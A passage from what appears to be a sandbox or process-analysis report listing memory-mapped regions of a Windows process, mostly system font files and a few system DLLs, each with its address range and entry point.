region_type = mapped_file
name = "ftltlt.ttf"
filename = "\\Windows\\Fonts\\FTLTLT.TTF" (normalized: "c:\\windows\\fonts\\ftltlt.ttf")
Region:
id = 2207
start_va = 0x12a0000
end_va = 0x12d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gara.ttf"
filename = "\\Windows\\Fonts\\GARA.TTF" (normalized: "c:\\windows\\fonts\\gara.ttf")
Region:
id = 2208
start_va = 0x2c00000
end_va = 0x2cdffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 2209
start_va = 0x560000
end_va = 0x590fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "garabd.ttf"
filename = "\\Windows\\Fonts\\GARABD.TTF" (normalized: "c:\\windows\\fonts\\garabd.ttf")
Region:
id = 2210
start_va = 0xd60000
end_va = 0xd8efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "garait.ttf"
filename = "\\Windows\\Fonts\\GARAIT.TTF" (normalized: "c:\\windows\\fonts\\garait.ttf")
Region:
id = 2211
start_va = 0x7ff8ce270000
end_va = 0x7ff8ce283fff
monitored = 0
entry_point = 0x7ff8ce271a50
region_type = mapped_file
name = "wlanradiomanager.dll"
filename = "\\Windows\\System32\\WlanRadioManager.dll" (normalized: "c:\\windows\\system32\\wlanradiomanager.dll")
Region:
id = 2212
start_va = 0x5a0000
end_va = 0x5c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gigi.ttf"
filename = "\\Windows\\Fonts\\GIGI.TTF" (normalized: "c:\\windows\\fonts\\gigi.ttf")
Region:
id = 2213
start_va = 0xd90000
end_va = 0xda0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gil_____.ttf"
filename = "\\Windows\\Fonts\\GIL_____.TTF" (normalized: "c:\\windows\\fonts\\gil_____.ttf")
Region:
id = 2214
start_va = 0x7ff8cf520000
end_va = 0x7ff8cf580fff
monitored = 0
entry_point = 0x7ff8cf524b50
region_type = mapped_file
name = "wlanapi.dll"
filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")
Region:
id = 2215
start_va = 0x12e0000
end_va = 0x12f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gilb____.ttf"
filename = "\\Windows\\Fonts\\GILB____.TTF" (normalized: "c:\\windows\\fonts\\gilb____.ttf")
Region:
id = 2216
start_va = 0x2940000
end_va = 0x2951fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gilbi___.ttf"
filename = "\\Windows\\Fonts\\GILBI___.TTF" (normalized: "c:\\windows\\fonts\\gilbi___.ttf")
Region:
id = 2217
start_va = 0x5d0000
end_va = 0x5defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gilc____.ttf"
filename = "\\Windows\\Fonts\\GILC____.TTF" (normalized: "c:\\windows\\fonts\\gilc____.ttf")
Region:
id = 2218
start_va = 0x7ff8ce250000
end_va = 0x7ff8ce268fff
monitored = 0
entry_point = 0x7ff8ce252180
region_type = mapped_file
name = "bthradiomedia.dll"
filename = "\\Windows\\System32\\BthRadioMedia.dll" (normalized: "c:\\windows\\system32\\bthradiomedia.dll")
Region:
id = 2219
start_va = 0x5e0000
end_va = 0x5f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gili____.ttf"
filename = "\\Windows\\Fonts\\GILI____.TTF" (normalized: "c:\\windows\\fonts\\gili____.ttf")
Region:
id = 2220
start_va = 0x890000
end_va = 0x8a1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gillubcd.ttf"
filename = "\\Windows\\Fonts\\GILLUBCD.TTF" (normalized: "c:\\windows\\fonts\\gillubcd.ttf")
Region:
id = 2221
start_va = 0xd10000
end_va = 0xd21fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gilsanub.ttf"
filename = "\\Windows\\Fonts\\GILSANUB.TTF" (normalized: "c:\\windows\\fonts\\gilsanub.ttf")
Region:
id = 2222
start_va = 0x7ff8d6180000
end_va = 0x7ff8d61c2fff
monitored = 0
entry_point = 0x7ff8d6194b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 2223
start_va = 0x7ff8d4090000
end_va = 0x7ff8d40b6fff
monitored = 0
entry_point = 0x7ff8d4097940
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 2224
start_va = 0x7ff8ce230000
end_va = 0x7ff8ce24dfff
monitored = 0
entry_point = 0x7ff8ce231690
region_type = mapped_file
name = "bluetoothapis.dll"
filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll")
Region:
id = 2225
start_va = 0x560000
end_va = 0x571fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "glecb.ttf"
filename = "\\Windows\\Fonts\\GLECB.TTF" (normalized: "c:\\windows\\fonts\\glecb.ttf")
Region:
id = 2226
start_va = 0x580000
end_va = 0x594fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "glsnecb.ttf"
filename = "\\Windows\\Fonts\\GLSNECB.TTF" (normalized: "c:\\windows\\fonts\\glsnecb.ttf")
Region:
id = 2227
start_va = 0xdb0000
end_va = 0xdd1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gothic.ttf"
filename = "\\Windows\\Fonts\\GOTHIC.TTF" (normalized: "c:\\windows\\fonts\\gothic.ttf")
Region:
id = 2228
start_va = 0xd30000
end_va = 0xd4ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gothicb.ttf"
filename = "\\Windows\\Fonts\\GOTHICB.TTF" (normalized: "c:\\windows\\fonts\\gothicb.ttf")
Region:
id = 2229
start_va = 0x1200000
end_va = 0x1221fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gothicbi.ttf"
filename = "\\Windows\\Fonts\\GOTHICBI.TTF" (normalized: "c:\\windows\\fonts\\gothicbi.ttf")
Region:
id = 2230
start_va = 0xd60000
end_va = 0xd84fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gothici.ttf"
filename = "\\Windows\\Fonts\\GOTHICI.TTF" (normalized: "c:\\windows\\fonts\\gothici.ttf")
Region:
id = 2231
start_va = 0x5a0000
end_va = 0x5b3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "goudos.ttf"
filename = "\\Windows\\Fonts\\GOUDOS.TTF" (normalized: "c:\\windows\\fonts\\goudos.ttf")
Region:
id = 2232
start_va = 0xde0000
end_va = 0xdf4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "goudosb.ttf"
filename = "\\Windows\\Fonts\\GOUDOSB.TTF" (normalized: "c:\\windows\\fonts\\goudosb.ttf")
Region:
id = 2233
start_va = 0x5c0000
end_va = 0x5d3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "goudosi.ttf"
filename = "\\Windows\\Fonts\\GOUDOSI.TTF" (normalized: "c:\\windows\\fonts\\goudosi.ttf")
Region:
id = 2234
start_va = 0x5e0000
end_va = 0x5edfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "goudysto.ttf"
filename = "\\Windows\\Fonts\\GOUDYSTO.TTF" (normalized: "c:\\windows\\fonts\\goudysto.ttf")
Region:
id = 2235
start_va = 0x5f0000
end_va = 0x5fdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "harlowsi.ttf"
filename = "\\Windows\\Fonts\\HARLOWSI.TTF" (normalized: "c:\\windows\\fonts\\harlowsi.ttf")
Region:
id = 2236
start_va = 0x890000
end_va = 0x8a1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "harngton.ttf"
filename = "\\Windows\\Fonts\\HARNGTON.TTF" (normalized: "c:\\windows\\fonts\\harngton.ttf")
Region:
id = 2247
start_va = 0xd90000
end_va = 0xdaafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "hatten.ttf"
filename = "\\Windows\\Fonts\\HATTEN.TTF" (normalized: "c:\\windows\\fonts\\hatten.ttf")
Region:
id = 2248
start_va = 0x560000
end_va = 0x576fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "htowert.ttf"
filename = "\\Windows\\Fonts\\HTOWERT.TTF" (normalized: "c:\\windows\\fonts\\htowert.ttf")
Region:
id = 2249
start_va = 0x580000
end_va = 0x592fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "htowerti.ttf"
filename = "\\Windows\\Fonts\\HTOWERTI.TTF" (normalized: "c:\\windows\\fonts\\htowerti.ttf")
Region:
id = 2252
start_va = 0x7ff8d4670000
end_va = 0x7ff8d4693fff
monitored = 0
entry_point = 0x7ff8d4673260
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 2253
start_va = 0x5a0000
end_va = 0x5aefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imprisha.ttf"
filename = "\\Windows\\Fonts\\IMPRISHA.TTF" (normalized: "c:\\windows\\fonts\\imprisha.ttf")
Region:
id = 2254
start_va = 0xd10000
end_va = 0xd22fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "infroman.ttf"
filename = "\\Windows\\Fonts\\INFROMAN.TTF" (normalized: "c:\\windows\\fonts\\infroman.ttf")
Region:
id = 2259
start_va = 0x5b0000
end_va = 0x5d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "itcblkad.ttf"
filename = "\\Windows\\Fonts\\ITCBLKAD.TTF" (normalized: "c:\\windows\\fonts\\itcblkad.ttf")
Region:
id = 2260
start_va = 0x5e0000
end_va = 0x5effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "itcedscr.ttf"
filename = "\\Windows\\Fonts\\ITCEDSCR.TTF" (normalized: "c:\\windows\\fonts\\itcedscr.ttf")
Region:
id = 2261
start_va = 0x5f0000
end_va = 0x5fefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "itckrist.ttf"
filename = "\\Windows\\Fonts\\ITCKRIST.TTF" (normalized: "c:\\windows\\fonts\\itckrist.ttf")
Region:
id = 2262
start_va = 0x890000
end_va = 0x8a1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "jokerman.ttf"
filename = "\\Windows\\Fonts\\JOKERMAN.TTF" (normalized: "c:\\windows\\fonts\\jokerman.ttf")
Region:
id = 2263
start_va = 0x8f0000
end_va = 0x8fffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "juice___.ttf"
filename = "\\Windows\\Fonts\\JUICE___.TTF" (normalized: "c:\\windows\\fonts\\juice___.ttf")
Region:
id = 2264
start_va = 0xd30000
end_va = 0xd3ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kunstler.ttf"
filename = "\\Windows\\Fonts\\KUNSTLER.TTF" (normalized: "c:\\windows\\fonts\\kunstler.ttf")
Region:
id = 2265
start_va = 0x560000
end_va = 0x56afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "latinwd.ttf"
filename = "\\Windows\\Fonts\\LATINWD.TTF" (normalized: "c:\\windows\\fonts\\latinwd.ttf")
Region:
id = 2266
start_va = 0xd60000
end_va = 0xd71fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lbrite.ttf"
filename = "\\Windows\\Fonts\\LBRITE.TTF" (normalized: "c:\\windows\\fonts\\lbrite.ttf")
Region:
id = 2267
start_va = 0x570000
end_va = 0x580fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lbrited.ttf"
filename = "\\Windows\\Fonts\\LBRITED.TTF" (normalized: "c:\\windows\\fonts\\lbrited.ttf")
Region:
id = 2268
start_va = 0x590000
end_va = 0x5a1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lbritedi.ttf"
filename = "\\Windows\\Fonts\\LBRITEDI.TTF" (normalized: "c:\\windows\\fonts\\lbritedi.ttf")
Region:
id = 2269
start_va = 0xd80000
end_va = 0xd91fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lbritei.ttf"
filename = "\\Windows\\Fonts\\LBRITEI.TTF" (normalized: "c:\\windows\\fonts\\lbritei.ttf")
Region:
id = 2270
start_va = 0xd40000
end_va = 0xd4dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lcallig.ttf"
filename = "\\Windows\\Fonts\\LCALLIG.TTF" (normalized: "c:\\windows\\fonts\\lcallig.ttf")
Region:
id = 2271
start_va = 0xda0000
end_va = 0xdb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "leelawad.ttf"
filename = "\\Windows\\Fonts\\LEELAWAD.TTF" (normalized: "c:\\windows\\fonts\\leelawad.ttf")
Region:
id = 2274
start_va = 0xdc0000
end_va = 0xdd6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "leelawdb.ttf"
filename = "\\Windows\\Fonts\\LEELAWDB.TTF" (normalized: "c:\\windows\\fonts\\leelawdb.ttf")
Region:
id = 2275
start_va = 0xde0000
end_va = 0xdeffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lfax.ttf"
filename = "\\Windows\\Fonts\\LFAX.TTF" (normalized: "c:\\windows\\fonts\\lfax.ttf")
Region:
id = 2276
start_va = 0xdf0000
end_va = 0xdfffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lfaxd.ttf"
filename = "\\Windows\\Fonts\\LFAXD.TTF" (normalized: "c:\\windows\\fonts\\lfaxd.ttf")
Region:
id = 2277
start_va = 0x1200000
end_va = 0x1211fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lfaxdi.ttf"
filename = "\\Windows\\Fonts\\LFAXDI.TTF" (normalized: "c:\\windows\\fonts\\lfaxdi.ttf")
Region:
id = 2278
start_va = 0x1220000
end_va = 0x1230fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lfaxi.ttf"
filename = "\\Windows\\Fonts\\LFAXI.TTF" (normalized: "c:\\windows\\fonts\\lfaxi.ttf")
Region:
id = 2279
start_va = 0x1250000
end_va = 0x125ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lhandw.ttf"
filename = "\\Windows\\Fonts\\LHANDW.TTF" (normalized: "c:\\windows\\fonts\\lhandw.ttf")
Region:
id = 2280
start_va = 0x1260000
end_va = 0x126ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lsans.ttf"
filename = "\\Windows\\Fonts\\LSANS.TTF" (normalized: "c:\\windows\\fonts\\lsans.ttf")
Region:
id = 2281
start_va = 0x1270000
end_va = 0x127efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lsansd.ttf"
filename = "\\Windows\\Fonts\\LSANSD.TTF" (normalized: "c:\\windows\\fonts\\lsansd.ttf")
Region:
id = 2282
start_va = 0x1280000
end_va = 0x1290fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lsansdi.ttf"
filename = "\\Windows\\Fonts\\LSANSDI.TTF" (normalized: "c:\\windows\\fonts\\lsansdi.ttf")
Region:
id = 2283
start_va = 0x12a0000
end_va = 0x12affff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lsansi.ttf"
filename = "\\Windows\\Fonts\\LSANSI.TTF" (normalized: "c:\\windows\\fonts\\lsansi.ttf")
Region:
id = 2284
start_va = 0x5b0000
end_va = 0x5bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ltype.ttf"
filename = "\\Windows\\Fonts\\LTYPE.TTF" (normalized: "c:\\windows\\fonts\\ltype.ttf")
Region:
id = 2285
start_va = 0x5c0000
end_va = 0x5ccfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ltypeb.ttf"
filename = "\\Windows\\Fonts\\LTYPEB.TTF" (normalized: "c:\\windows\\fonts\\ltypeb.ttf")
Region:
id = 2286
start_va = 0x5d0000
end_va = 0x5ddfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ltypebo.ttf"
filename = "\\Windows\\Fonts\\LTYPEBO.TTF" (normalized: "c:\\windows\\fonts\\ltypebo.ttf")
Region:
id = 2287
start_va = 0x5e0000
end_va = 0x5effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ltypeo.ttf"
filename = "\\Windows\\Fonts\\LTYPEO.TTF" (normalized: "c:\\windows\\fonts\\ltypeo.ttf")
Region:
id = 2288
start_va = 0xd10000
end_va = 0xd1ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "magnetob.ttf"
filename = "\\Windows\\Fonts\\MAGNETOB.TTF" (normalized: "c:\\windows\\fonts\\magnetob.ttf")
Region:
id = 2289
start_va = 0xd20000
end_va = 0xd2efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "maian.ttf"
filename = "\\Windows\\Fonts\\MAIAN.TTF" (normalized: "c:\\windows\\fonts\\maian.ttf")
Region:
id = 2290
start_va = 0x12b0000
end_va = 0x12bcfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "maturasc.ttf"
filename = "\\Windows\\Fonts\\MATURASC.TTF" (normalized: "c:\\windows\\fonts\\maturasc.ttf")
Region:
id = 2291
start_va = 0x12c0000
end_va = 0x12eefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mistral.ttf"
filename = "\\Windows\\Fonts\\MISTRAL.TTF" (normalized: "c:\\windows\\fonts\\mistral.ttf")
Region:
id = 2292
start_va = 0x12f0000
end_va = 0x12fffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mod20.ttf"
filename = "\\Windows\\Fonts\\MOD20.TTF" (normalized: "c:\\windows\\fonts\\mod20.ttf")
Region:
id = 2293
start_va = 0x2940000
end_va = 0x2978fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msuighub.ttf"
filename = "\\Windows\\Fonts\\MSUIGHUB.TTF" (normalized: "c:\\windows\\fonts\\msuighub.ttf")
Region:
id = 2294
start_va = 0x2980000
end_va = 0x29b6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msuighur.ttf"
filename = "\\Windows\\Fonts\\MSUIGHUR.TTF" (normalized: "c:\\windows\\fonts\\msuighur.ttf")
Region:
id = 2295
start_va = 0x29c0000
end_va = 0x29e6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mtcorsva.ttf"
filename = "\\Windows\\Fonts\\MTCORSVA.TTF" (normalized: "c:\\windows\\fonts\\mtcorsva.ttf")
Region:
id = 2296
start_va = 0x2ce0000
end_va = 0x2cf7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "niageng.ttf"
filename = "\\Windows\\Fonts\\NIAGENG.TTF" (normalized: "c:\\windows\\fonts\\niageng.ttf")
Region:
id = 2297
start_va = 0x890000
end_va = 0x8a2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "niagsol.ttf"
filename = "\\Windows\\Fonts\\NIAGSOL.TTF" (normalized: "c:\\windows\\fonts\\niagsol.ttf")
Region:
id = 2298
start_va = 0x5f0000
end_va = 0x5fdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ocraext.ttf"
filename = "\\Windows\\Fonts\\OCRAEXT.TTF" (normalized: "c:\\windows\\fonts\\ocraext.ttf")
Region:
id = 2299
start_va = 0x2d00000
end_va = 0x2d16fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oldengl.ttf"
filename = "\\Windows\\Fonts\\OLDENGL.TTF" (normalized: "c:\\windows\\fonts\\oldengl.ttf")
Region:
id = 2300
start_va = 0x2d20000
end_va = 0x2d33fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "onyx.ttf"
filename = "\\Windows\\Fonts\\ONYX.TTF" (normalized: "c:\\windows\\fonts\\onyx.ttf")
Region:
id = 2301
start_va = 0x560000
end_va = 0x564fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "outlook.ttf"
filename = "\\Windows\\Fonts\\OUTLOOK.TTF" (normalized: "c:\\windows\\fonts\\outlook.ttf")
Region:
id = 2302
start_va = 0x570000
end_va = 0x57cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "palscri.ttf"
filename = "\\Windows\\Fonts\\PALSCRI.TTF" (normalized: "c:\\windows\\fonts\\palscri.ttf")
Region:
id = 2303
start_va = 0x580000
end_va = 0x5a7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "papyrus.ttf"
filename = "\\Windows\\Fonts\\PAPYRUS.TTF" (normalized: "c:\\windows\\fonts\\papyrus.ttf")
Region:
id = 2304
start_va = 0xd60000
end_va = 0xd84fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "parchm.ttf"
filename = "\\Windows\\Fonts\\PARCHM.TTF" (normalized: "c:\\windows\\fonts\\parchm.ttf")
Region:
id = 2305
start_va = 0x8f0000
end_va = 0x8fefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "per_____.ttf"
filename = "\\Windows\\Fonts\\PER_____.TTF" (normalized: "c:\\windows\\fonts\\per_____.ttf")
Region:
id = 2306
start_va = 0xd30000
end_va = 0xd3efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "perb____.ttf"
filename = "\\Windows\\Fonts\\PERB____.TTF" (normalized: "c:\\windows\\fonts\\perb____.ttf")
Region:
id = 2307
start_va = 0xd90000
end_va = 0xda2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "perbi___.ttf"
filename = "\\Windows\\Fonts\\PERBI___.TTF" (normalized: "c:\\windows\\fonts\\perbi___.ttf")
Region:
id = 2308
start_va = 0xdb0000
end_va = 0xdc2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "peri____.ttf"
filename = "\\Windows\\Fonts\\PERI____.TTF" (normalized: "c:\\windows\\fonts\\peri____.ttf")
Region:
id = 2309
start_va = 0xd40000
end_va = 0xd4bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "pertibd.ttf"
filename = "\\Windows\\Fonts\\PERTIBD.TTF" (normalized: "c:\\windows\\fonts\\pertibd.ttf")
Region:
id = 2310
start_va = 0xdd0000
end_va = 0xddafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "pertili.ttf"
filename = "\\Windows\\Fonts\\PERTILI.TTF" (normalized: "c:\\windows\\fonts\\pertili.ttf")
Region:
id = 2311
start_va = 0xde0000
end_va = 0xdebfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "playbill.ttf"
filename = "\\Windows\\Fonts\\PLAYBILL.TTF" (normalized: "c:\\windows\\fonts\\playbill.ttf")
Region:
id = 2312
start_va = 0x1200000
end_va = 0x1212fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "poorich.ttf"
filename = "\\Windows\\Fonts\\POORICH.TTF" (normalized: "c:\\windows\\fonts\\poorich.ttf")
Region:
id = 2313
start_va = 0x1220000
end_va = 0x1234fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "pristina.ttf"
filename = "\\Windows\\Fonts\\PRISTINA.TTF" (normalized: "c:\\windows\\fonts\\pristina.ttf")
Region:
id = 2314
start_va = 0x1250000
end_va = 0x1270fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rage.ttf"
filename = "\\Windows\\Fonts\\RAGE.TTF" (normalized: "c:\\windows\\fonts\\rage.ttf")
Region:
id = 2315
start_va = 0x1280000
end_va = 0x1292fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ravie.ttf"
filename = "\\Windows\\Fonts\\RAVIE.TTF" (normalized: "c:\\windows\\fonts\\ravie.ttf")
Region:
id = 2316
start_va = 0x2d40000
end_va = 0x2d75fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "refsan.ttf"
filename = "\\Windows\\Fonts\\REFSAN.TTF" (normalized: "c:\\windows\\fonts\\refsan.ttf")
Region:
id = 2317
start_va = 0x5c0000
end_va = 0x5cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rocc____.ttf"
filename = "\\Windows\\Fonts\\ROCC____.TTF" (normalized: "c:\\windows\\fonts\\rocc____.ttf")
Region:
id = 2318
start_va = 0x5d0000
end_va = 0x5defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "roccb___.ttf"
filename = "\\Windows\\Fonts\\ROCCB___.TTF" (normalized: "c:\\windows\\fonts\\roccb___.ttf")
Region:
id = 2319
start_va = 0xd10000
end_va = 0xd21fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rock.ttf"
filename = "\\Windows\\Fonts\\ROCK.TTF" (normalized: "c:\\windows\\fonts\\rock.ttf")
Region:
id = 2320
start_va = 0x560000
end_va = 0x570fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rockb.ttf"
filename = "\\Windows\\Fonts\\ROCKB.TTF" (normalized: "c:\\windows\\fonts\\rockb.ttf")
Region:
id = 2321
start_va = 0x580000
end_va = 0x591fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rockbi.ttf"
filename = "\\Windows\\Fonts\\ROCKBI.TTF" (normalized: "c:\\windows\\fonts\\rockbi.ttf")
Region:
id = 2322
start_va = 0x5a0000
end_va = 0x5acfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rockeb.ttf"
filename = "\\Windows\\Fonts\\ROCKEB.TTF" (normalized: "c:\\windows\\fonts\\rockeb.ttf")
Region:
id = 2323
start_va = 0x5e0000
end_va = 0x5f2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rocki.ttf"
filename = "\\Windows\\Fonts\\ROCKI.TTF" (normalized: "c:\\windows\\fonts\\rocki.ttf")
Region:
id = 2324
start_va = 0xd60000
end_va = 0xd89fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schlbkb.ttf"
filename = "\\Windows\\Fonts\\SCHLBKB.TTF" (normalized: "c:\\windows\\fonts\\schlbkb.ttf")
Region:
id = 2325
start_va = 0xd90000
end_va = 0xdb7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schlbkbi.ttf"
filename = "\\Windows\\Fonts\\SCHLBKBI.TTF" (normalized: "c:\\windows\\fonts\\schlbkbi.ttf")
Region:
id = 2326
start_va = 0xdc0000
end_va = 0xde7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schlbki.ttf"
filename = "\\Windows\\Fonts\\SCHLBKI.TTF" (normalized: "c:\\windows\\fonts\\schlbki.ttf")
Region:
id = 2327
start_va = 0x5b0000
end_va = 0x5bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "scriptbl.ttf"
filename = "\\Windows\\Fonts\\SCRIPTBL.TTF" (normalized: "c:\\windows\\fonts\\scriptbl.ttf")
Region:
id = 2328
start_va = 0x5c0000
end_va = 0x5ccfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "showg.ttf"
filename = "\\Windows\\Fonts\\SHOWG.TTF" (normalized: "c:\\windows\\fonts\\showg.ttf")
Region:
id = 2329
start_va = 0x5d0000
end_va = 0x5dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "snap____.ttf"
filename = "\\Windows\\Fonts\\SNAP____.TTF" (normalized: "c:\\windows\\fonts\\snap____.ttf")
Region:
id = 2330
start_va = 0x890000
end_va = 0x89dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stencil.ttf"
filename = "\\Windows\\Fonts\\STENCIL.TTF" (normalized: "c:\\windows\\fonts\\stencil.ttf")
Region:
id = 2331
start_va = 0xd30000
end_va = 0xd42fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcb_____.ttf"
filename = "\\Windows\\Fonts\\TCB_____.TTF" (normalized: "c:\\windows\\fonts\\tcb_____.ttf")
Region:
id = 2332
start_va = 0x1200000
end_va = 0x1212fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcbi____.ttf"
filename = "\\Windows\\Fonts\\TCBI____.TTF" (normalized: "c:\\windows\\fonts\\tcbi____.ttf")
Region:
id = 2333
start_va = 0x1220000
end_va = 0x1230fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tccb____.ttf"
filename = "\\Windows\\Fonts\\TCCB____.TTF" (normalized: "c:\\windows\\fonts\\tccb____.ttf")
Region:
id = 2334
start_va = 0x1250000
end_va = 0x1262fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcceb.ttf"
filename = "\\Windows\\Fonts\\TCCEB.TTF" (normalized: "c:\\windows\\fonts\\tcceb.ttf")
Region:
id = 2335
start_va = 0x1270000
end_va = 0x1280fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tccm____.ttf"
filename = "\\Windows\\Fonts\\TCCM____.TTF" (normalized: "c:\\windows\\fonts\\tccm____.ttf")
Region:
id = 2336
start_va = 0x1290000
end_va = 0x12a2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcm_____.ttf"
filename = "\\Windows\\Fonts\\TCM_____.TTF" (normalized: "c:\\windows\\fonts\\tcm_____.ttf")
Region:
id = 2337
start_va = 0x12b0000
end_va = 0x12c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcmi____.ttf"
filename = "\\Windows\\Fonts\\TCMI____.TTF" (normalized: "c:\\windows\\fonts\\tcmi____.ttf")
Region:
id = 2338
start_va = 0x12d0000
end_va = 0x12e2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tempsitc.ttf"
